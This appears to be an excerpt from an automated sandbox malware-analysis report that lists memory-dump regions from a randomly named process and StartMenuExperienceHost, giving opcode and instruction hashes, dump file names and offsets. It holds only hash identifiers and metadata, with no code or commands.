• Opcode Fuzzy Hash: 8d8c87ef82465b0aadf3648e4c0fd9655d132576f259e1c0e0265973199564fe
• Instruction Fuzzy Hash: 3F314C10B1D5AE8FE33DA26854746747FA1FF9130471E45BAD09B8B4E7C82CB9859381
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f35d72e1fbc4eddd4e6902f14a2e24be6853f118a11db8cb5cb0c79d7d5ecf46
• Instruction ID: abf918c6993908c657de1670b533c83f8c3a81656c85f2ae7458b32892a2fd7f
• Opcode Fuzzy Hash: f35d72e1fbc4eddd4e6902f14a2e24be6853f118a11db8cb5cb0c79d7d5ecf46
• Instruction Fuzzy Hash: D1312710B1E5DA4EE33AA65E84745747F91FF9131871A86BEC08ACB4EBD82CB981D341
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 947fb0ada535de7414e8fa0534f927b1ed472e23ead2bb87dcb587240936a0c0
• Instruction ID: 049af286ca50944017c38bb78ceead2d495581ef4d87944a7d032133085eb6be
• Opcode Fuzzy Hash: 947fb0ada535de7414e8fa0534f927b1ed472e23ead2bb87dcb587240936a0c0
• Instruction Fuzzy Hash: E6214552B1FECA4FD795AB684C749A1BF90FFA222470445BBD099C71E3ED142809C342
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3907470986d882f3b7950c5f1f45956c2ac3d4f72b4cebf2d06af277a81c895
• Instruction ID: f5559070a3094412f84d914a116b553c250d479f2c01047c4a967a0e83d99596
• Opcode Fuzzy Hash: d3907470986d882f3b7950c5f1f45956c2ac3d4f72b4cebf2d06af277a81c895
• Instruction Fuzzy Hash: 7E218B31B0A14E8FEB29AA68D8291F83B91FF44355F01017BE48DC75E2CF2AB5408750
Memory Dump Source
• Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 529b6314e6f0bbbe6cb13998373f77269f2d8097ce060d217e27cdf70e68a28e
• Instruction ID: 479397b94f787560daf27702690d0816eeec607bf1639e5d3c6bc8fe12460121
• Opcode Fuzzy Hash: 529b6314e6f0bbbe6cb13998373f77269f2d8097ce060d217e27cdf70e68a28e
• Instruction Fuzzy Hash: 6E212926F0D74D8BE712A7B898261EC7B70EF42325F1682B3D045CB1F3D93826468791
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d30e34f83523491c217d7260e5405186244ea0d4a6568c889f5c3bae22bd5592
• Instruction ID: f0fa17841d5d4ace3f667e4aa6dfe416b5ab347115667f0c2f226c58b6f2ebe1
• Opcode Fuzzy Hash: d30e34f83523491c217d7260e5405186244ea0d4a6568c889f5c3bae22bd5592
• Instruction Fuzzy Hash: 6B214D34F1A94D9FDBA9EB58C465AADBBB1FF58314F0105BED00AD32E1CE3469408B40
Memory Dump Source
• Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 88bd8b53c710a63d2e2e8be0bbc007f13b1a0ad75b1206f9a2d8273b0592ac3d
• Instruction ID: f4c4be0bc5e5ca4334e89b5a30da08be239a344cdf580cb10cb0ecf3120d4b7c
• Opcode Fuzzy Hash: 88bd8b53c710a63d2e2e8be0bbc007f13b1a0ad75b1206f9a2d8273b0592ac3d
• Instruction Fuzzy Hash: A621E2B4A196A89EE748DF68C4A97A97FE0F759729F00017FC01AD77E2C7B81060C740
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e20ee9ed93aad6f88146293ce1b8ac916258734da40eb30f5e9db03b7c06e8f3
• Instruction ID: e787889a2b5793455135af210ba4a87e204e84f6a2d33c34e9a52a1a6393eb6b
• Opcode Fuzzy Hash: e20ee9ed93aad6f88146293ce1b8ac916258734da40eb30f5e9db03b7c06e8f3
• Instruction Fuzzy Hash: B021FC71F1950D9FDB9CEB98C465AADBBB1FF58304F0100BDD04AD32A1CE34A9818B40
Memory Dump Source
• Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0565b415c2bb7dda9eced0d8e02a9f2b1f90651c74fcb11bd6cfa91e8b001a3
• Instruction ID: c88ad151b4a83942c49dd4a8d5a5fcd2cdc741ff5aeb233165d591b9703bcce5
• Opcode Fuzzy Hash: b0565b415c2bb7dda9eced0d8e02a9f2b1f90651c74fcb11bd6cfa91e8b001a3
• Instruction Fuzzy Hash: 5C216324F1E60D4BE7B4E75498666B87391FF48700F5203B5D84EE32B2EE286E548681
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d2ece72d1989c5ef5229e5ac40d0015767b410e4cefe2e14f45b9702117c0c2
• Instruction ID: c534095a6b3dbe6e748f3c1e81326cd9bc50c573ed6055736975c66a8a2341fc
• Opcode Fuzzy Hash: 3d2ece72d1989c5ef5229e5ac40d0015767b410e4cefe2e14f45b9702117c0c2
• Instruction Fuzzy Hash: 26110010B2D46E8EF73CA2545074BB47BA1FF943097198579D05B8B5EAC83CBA8093C0
Memory Dump Source
• Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0dd6c8879502d69b1d4acfc7d43208f66abbda1fedb14710b1bdbd2ba0574af1
                                                                                      • Instruction ID: 576f8ea218894c1d561a96a4aa5b854b3057ca33633c16b62307f92f4ffe7570
                                                                                      • Opcode Fuzzy Hash: 0dd6c8879502d69b1d4acfc7d43208f66abbda1fedb14710b1bdbd2ba0574af1
                                                                                      • Instruction Fuzzy Hash: 6211EB10B1D46E4AF63CF64E94B45B47B91FF90309715867DD44B8B5DAC82CBA81D380
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: de285a9b7b770367f9c02766cede68982fefcb69ba530c08f003d1c627c65be2
                                                                                      • Instruction ID: 6a74d976f2eb4448bb7320b5b80444d7324b8e3228c7223e17a91a79902233b5
                                                                                      • Opcode Fuzzy Hash: de285a9b7b770367f9c02766cede68982fefcb69ba530c08f003d1c627c65be2
                                                                                      • Instruction Fuzzy Hash: 71112B31F0990E8ED768FB6488258FE73A1FF58341B41053AD08EC35E2CE28F5058780
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab2bc6504269cd300634b29b4c3c1927a93e614c194057ef0e605ebb7b2f404f
                                                                                      • Instruction ID: af129f65132b31815a377a30eb5477aaf6c91b57453b36f890563fa8da122a16
                                                                                      • Opcode Fuzzy Hash: ab2bc6504269cd300634b29b4c3c1927a93e614c194057ef0e605ebb7b2f404f
                                                                                      • Instruction Fuzzy Hash: 5A110431B1994E8EE7A8BB6580218FE7791FF58305B41057AD44EC35E2CE28B604C740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7332d778cf5a11e9c17f4c2e7895eb3935997f88e5d8d578ada0ef5a9c29448f
                                                                                      • Instruction ID: b3281213eade8bbeac2ca35fbae0aff6bddd4e071130f938c132baaf2680b7cf
                                                                                      • Opcode Fuzzy Hash: 7332d778cf5a11e9c17f4c2e7895eb3935997f88e5d8d578ada0ef5a9c29448f
                                                                                      • Instruction Fuzzy Hash: C111E062F0F58E8EE77536A194321BD3E10BF01319F56107BD88E865E3C91D26048361
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e807aef494de0a95309d467ab6d42da3724d757536b93146ff393dbdc1ea57be
                                                                                      • Instruction ID: 4f762f0fa35451a12b49d8ba56aa14bde31c4685e2076b33e803df32d59f105b
                                                                                      • Opcode Fuzzy Hash: e807aef494de0a95309d467ab6d42da3724d757536b93146ff393dbdc1ea57be
                                                                                      • Instruction Fuzzy Hash: C1110A31F1981D9FDB9CEB58D465AFDBBA1FB98314F0101BED00ED36A1CE2569408B40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb8cf7a959b2233d7308b2ce0e9ca4a9c4ffcddcae57bfb73d2e3a47f49128d7
                                                                                      • Instruction ID: 14f43d30eb76da6977224ff7ec7e18a433d5056d17e79a44e33900cbc3f72b83
                                                                                      • Opcode Fuzzy Hash: fb8cf7a959b2233d7308b2ce0e9ca4a9c4ffcddcae57bfb73d2e3a47f49128d7
                                                                                      • Instruction Fuzzy Hash: CE11FC70B1990D9FDF98EB58C465ABDB7A1FB58304F0101BED00EE3691CE34A9808B00
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51e595b7851aee58b89bbede1c6c5520f84b40f302577814563166315c18f3d2
                                                                                      • Instruction ID: e31fb4cd9039d27c26dc70200aae4f35f26ca93761c30eb3b82f1f86f94e84bb
                                                                                      • Opcode Fuzzy Hash: 51e595b7851aee58b89bbede1c6c5520f84b40f302577814563166315c18f3d2
                                                                                      • Instruction Fuzzy Hash: C8119E22B0A74D8FE7129BA898661D97BB0EF42611F1646B3C044DB1B2D93826468790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d0e5fe81fd4523b6a038c6bb29b3e562ca72969f9020d4e801ad8e020c56f81c
                                                                                      • Instruction ID: 83f8634eb113ed570ba4cc3de32b20800b465e2eb489790bef2d6fc17769af5b
                                                                                      • Opcode Fuzzy Hash: d0e5fe81fd4523b6a038c6bb29b3e562ca72969f9020d4e801ad8e020c56f81c
                                                                                      • Instruction Fuzzy Hash: 6B01AD32A0A78C8FE712DBA4C8661DD7BB0EF42711F1642B3D045DB1B2D9386A4A8790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab5a3e43d8ddaf040a8d85d453092d2ec4ef516f1b9ad22d45b48badb8b3240d
                                                                                      • Instruction ID: 1b5462dc11cf11262a8a1b0604a8c35d7fb86062a758e598aed0c864db7f222c
                                                                                      • Opcode Fuzzy Hash: ab5a3e43d8ddaf040a8d85d453092d2ec4ef516f1b9ad22d45b48badb8b3240d
                                                                                      • Instruction Fuzzy Hash: 28F0D131B0CA484EE768AA1CA82A2BC33D1FF98225B40017BE48EC35E6DE2568028641
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17df65fdaa216d018894ac2bce6ec169046161a7d0980e06e7b9e77df9162242
                                                                                      • Instruction ID: 12283341d4ca093e26fb87a55ea5339e144b80ebc8b382e2f2bf6bac0660dba5
                                                                                      • Opcode Fuzzy Hash: 17df65fdaa216d018894ac2bce6ec169046161a7d0980e06e7b9e77df9162242
                                                                                      • Instruction Fuzzy Hash: 9801D622B0E55D8FE7263AB4982A5FD3B51FF45365F410177D48DC60E3CE19A60483A1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e00b5508f11eeff2994422b72da311a048146efbceaf1454f08d2b2b09cb749a
                                                                                      • Instruction ID: d26b790cec1e6d96fb5f0ab8b591d90cfcad6a7efb01bb07e105dcf9df93d4be
                                                                                      • Opcode Fuzzy Hash: e00b5508f11eeff2994422b72da311a048146efbceaf1454f08d2b2b09cb749a
                                                                                      • Instruction Fuzzy Hash: 4CF0492144E2C44FC3129B748C159957FE0EF5721470A86EAD089CB573D65D8986CB11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 050301aea24f24b1a5ea3e5b1ac4e5de90651dae30ac938d705ae09fecf8403e
                                                                                      • Instruction ID: 63ec5858099eba4fff2780451267cf6b3284d7ac1ccdaca4d53fd57a8787cb42
                                                                                      • Opcode Fuzzy Hash: 050301aea24f24b1a5ea3e5b1ac4e5de90651dae30ac938d705ae09fecf8403e
                                                                                      • Instruction Fuzzy Hash: 90019E32A0E78C9FD712DBB4C8551DD7BB0AF46714F1642E3D045DB1B2D9386A458740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 725b842a9a5a4a52bf62be773784adcc3b93b41b92749583071948816e4101bb
                                                                                      • Instruction ID: c12e3aab03966286d92642901fb5b388af03f12cc8db57b5508df4e3c3122bad
                                                                                      • Opcode Fuzzy Hash: 725b842a9a5a4a52bf62be773784adcc3b93b41b92749583071948816e4101bb
                                                                                      • Instruction Fuzzy Hash: 41011231A0894C8FCF98EF58C864FD977B0FBA8315F5501A9D40DE72A1DA359AC1CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 28bb231fdad662e7928acdfcc1ca40ca755a7f079ac01ffc071c60fc89b1f33d
                                                                                      • Instruction ID: b2def2fd72183a98e94b4eed4e1a460c738ed653b06278bc1bd68485dd972a7d
                                                                                      • Opcode Fuzzy Hash: 28bb231fdad662e7928acdfcc1ca40ca755a7f079ac01ffc071c60fc89b1f33d
                                                                                      • Instruction Fuzzy Hash: 4801FF31A0894C8FDF98EF58C864BD877B0FBA8315F5501A9D40DE72A1DA359AC1CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fd6605f4c09059d939853e38dfab4bcd09fbfe36746545a0a169aef2d0c4358d
                                                                                      • Instruction ID: 1377120f84ad248e2d109055a77a8275fab13b33a5999a559af40d70f86daa9a
                                                                                      • Opcode Fuzzy Hash: fd6605f4c09059d939853e38dfab4bcd09fbfe36746545a0a169aef2d0c4358d
                                                                                      • Instruction Fuzzy Hash: 5A011771A0995D8FDB98EF888465AB8BBB1FB68305F0500BEC00DD36A1CA35A980CB00
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1892591316.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9bbf0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7dc07d05832f17425afd940ce25e7e447bb324223814c7c8c2852d60ee0d08a7
                                                                                      • Instruction ID: 9462a9b844a4f935d84f4dc65033e7f0c92552cd3f923d5e88a195ae840d15bc
                                                                                      • Opcode Fuzzy Hash: 7dc07d05832f17425afd940ce25e7e447bb324223814c7c8c2852d60ee0d08a7
                                                                                      • Instruction Fuzzy Hash: F50149B1B1BA544FEB64FBF488662A837B1FF18304B05017CD09AC72D3DA286803C700
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000031.00000002.1858305835.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_49_2_7ffd9b7e0000_pzPgKRlGoglDaRzDTBMXwbN.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 819fce94d6e4c004480f478ad9e84e8c65ce984ed6cd9e67a8f6349eef31a7ea
                                                                                      • Instruction ID: 9af30ea0bb62dc70432ac15d81d07f2cec30009e0e5d84e088cfb8e5fbf7fe92
                                                                                      • Opcode Fuzzy Hash: 819fce94d6e4c004480f478ad9e84e8c65ce984ed6cd9e67a8f6349eef31a7ea
                                                                                      • Instruction Fuzzy Hash: 6E018B31E0E78D9FEB12DBB488655EDBBB0AF06704F1642E3D045DB2B2E9386A448741
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                                      • Instruction ID: 3fcb713a8304d49d3f7d90167fec7fe176147bf03122198cf93790844dcc36ca
                                                                                      • Opcode Fuzzy Hash: 68f34c3b3e72bf3d437eb4902a45668d135c994d5871d7ce3bcb564642de3738
                                                                                      • Instruction Fuzzy Hash: 2FA00204F0E91E45E47176E400E22BD44413F49605B624431E00E856F6CE1CAB061697
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5\_H
                                                                                      • API String ID: 0-3325266018
                                                                                      • Opcode ID: f63b4cb3078c0ce9048a1bccba5b3ec75da77f22dc3c87c5db6fb538d0a20cfa
                                                                                      • Instruction ID: 5eac6df88b0ab4a73d75da3bfb808e9122d37ff4ee53f2a7e2c3be8017a59d89
                                                                                      • Opcode Fuzzy Hash: f63b4cb3078c0ce9048a1bccba5b3ec75da77f22dc3c87c5db6fb538d0a20cfa
                                                                                      • Instruction Fuzzy Hash: 5C9121B1A19A8E5FE759DF688869BB9BFE0FB55310F0001BED059C73E6DB7824008740
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: c9$!k9$"s9
                                                                                      • API String ID: 0-3426396564
                                                                                      • Opcode ID: 3efba0b2dfb799383282180210f61f4ca41bd01aa0ef8a13ce432796815085de
                                                                                      • Instruction ID: 6df3e40dc8ca5c0ce8b7f295e97b606dcf492aa51b7982d67eac5967c5a261b8
                                                                                      • Opcode Fuzzy Hash: 3efba0b2dfb799383282180210f61f4ca41bd01aa0ef8a13ce432796815085de
                                                                                      • Instruction Fuzzy Hash: 96F0F93671D54A9FD701BA7EB8408DA379CDB89135B9601BBE104C7262D210185A87E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 993fae611c5db00616e872b2eadf9cf3e9a78b4f3cd4f514ff1f1a5fe22865ca
                                                                                      • Instruction ID: 999488e6daa638a2bac8e1df460110c60f2b22175a9eb17e2bbc4533b2e21148
                                                                                      • Opcode Fuzzy Hash: 993fae611c5db00616e872b2eadf9cf3e9a78b4f3cd4f514ff1f1a5fe22865ca
                                                                                      • Instruction Fuzzy Hash: 6231253270D9184FE768EA5CE89A9B977D0EF4532171602BFE48AC7276DD11EC8287C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5647164d5d20d0a2539d5eb1cc40100abab5e31fca9800f453884e5655bd0d82
                                                                                      • Instruction ID: 09f350360919ffeedd2b830821d5523243d771dffcb8ccc9ee31f4e5f439a76f
                                                                                      • Opcode Fuzzy Hash: 5647164d5d20d0a2539d5eb1cc40100abab5e31fca9800f453884e5655bd0d82
                                                                                      • Instruction Fuzzy Hash: F1314B12F0D6991EE318F3B864ADAFC3791DF88326B1545BBD04DC72EBDD1868818285
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 248a13611b1faa86910891f13b6d1e8ccdd827d84444aa472ce0ec2dd4d5e91f
                                                                                      • Instruction ID: 4908394d14ef015ca5e1b6f37321b573f3f516ca19c6b29be7da27732a9fa52f
                                                                                      • Opcode Fuzzy Hash: 248a13611b1faa86910891f13b6d1e8ccdd827d84444aa472ce0ec2dd4d5e91f
                                                                                      • Instruction Fuzzy Hash: A3213820B19A1D1FF798F76C946AA7972C2EB98312F5101BDE40DC33FBDC18AC418245
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000032.00000002.2108152556.00007FFD9B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b7c0000_StartMenuExperienceHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41221a6ab6e72a4b1130621464892e1657b782e88e659e2a8934a9beabd28c8f
                                                                                      • Instruction ID: 5ae673c0726b98dbdf70e9846f014d0ec030dbce7127d904850f07d79d3c2dc9
